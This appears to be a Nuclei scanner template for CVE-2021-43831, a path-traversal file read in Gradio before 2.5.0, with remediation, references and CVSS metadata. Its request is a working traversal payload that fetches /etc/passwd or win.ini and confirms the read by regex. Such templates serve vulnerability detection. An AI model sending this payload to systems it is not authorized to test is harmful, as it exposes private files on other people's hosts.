id: CVE-2021-43831 info: name: Gradio < 2.5.0 - Arbitrary File Read author: isacaya severity: high description: | Files on the host computer can be accessed from the Gradio interface impact: | An attacker would be able to view the contents of a file on the computer. remediation: | Update to version 2.5.0. reference: - https://github.com/gradio-app/gradio/security/advisories/GHSA-rhq2-3vr9-6mcr - https://github.com/gradio-app/gradio/commit/41bd3645bdb616e1248b2167ca83636a2653f781 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N cvss-score: 7.7 cve-id: CVE-2021-43831 cwe-id: CWE-22 epss-score: 0.00063 epss-percentile: 0.26511 cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:* metadata: vendor: gradio_project product: gradio framework: python shodan-query: title:"Gradio" tags: cve,cve2021,lfi,gradio http: - method: GET path: - "{{BaseURL}}/file/../../../../../../../../../../../../../../../../../..{{path}}" payloads: path: - /etc/passwd - /windows/win.ini stop-at-first-match: true matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or - type: status status: - 200 # digest: 490a00463044022032ecd11c32d5ba5b3a614d6572928a93718eecf820b73a7ed7613c012085b9af02207bceba36fe78c3968f2ca537e592c5f1c5e3aee5a141a64a0d7a9932c9f3af4d:922c64590222798bb761d5b6d8e72950